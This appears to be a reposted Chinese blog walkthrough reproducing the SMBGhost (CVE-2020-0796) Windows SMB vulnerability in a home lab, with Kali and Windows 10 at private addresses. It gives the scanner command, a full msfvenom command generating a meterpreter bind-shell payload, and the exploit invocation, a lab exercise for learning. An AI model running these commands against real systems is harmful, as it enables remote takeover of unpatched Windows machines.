其他分享
首页 > 其他分享> > 永恒之黑CVE-2020-0796

永恒之黑CVE-2020-0796

作者:互联网

1.永恒之黑漏洞复现需要准备三个东西,1个为kali攻击机,一个为win10靶机(关闭防火墙)

kali:192.168.15.128

win10:192.168.15.133

1.以下下是准备好的poc工具

 2.首先第一步我们对靶机进行漏洞检测,使用到的是SMBGhost这个工具进行漏洞检测,python3 scanner.py 192.168.15.133

cd进入目录后查看

 检测出来存在该漏洞

 3.下一步我们用msf生成一个编码为X00的shellcode,反向连接木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

 4.打开POC文件将里面的exploit.py buf后面的代码进行修改

 

 

 5.将exploit里面的内容进行替换,然后保存文件,在kali里面运行

 5.下一步我们进入msf,然后设置好ip和反弹连接端口,然后开启端口监听

 6.下一步我们用刚才的脚本进行攻击等待shell连接,python3 exploit -ip 192.168.15.133

 7.如果拿不到shell就多点几次,成功拿到shell!

标签:15.133,shell,kali,192.168,漏洞,exploit,2020,0796,CVE
来源: https://www.cnblogs.com/drdsct/p/15793707.html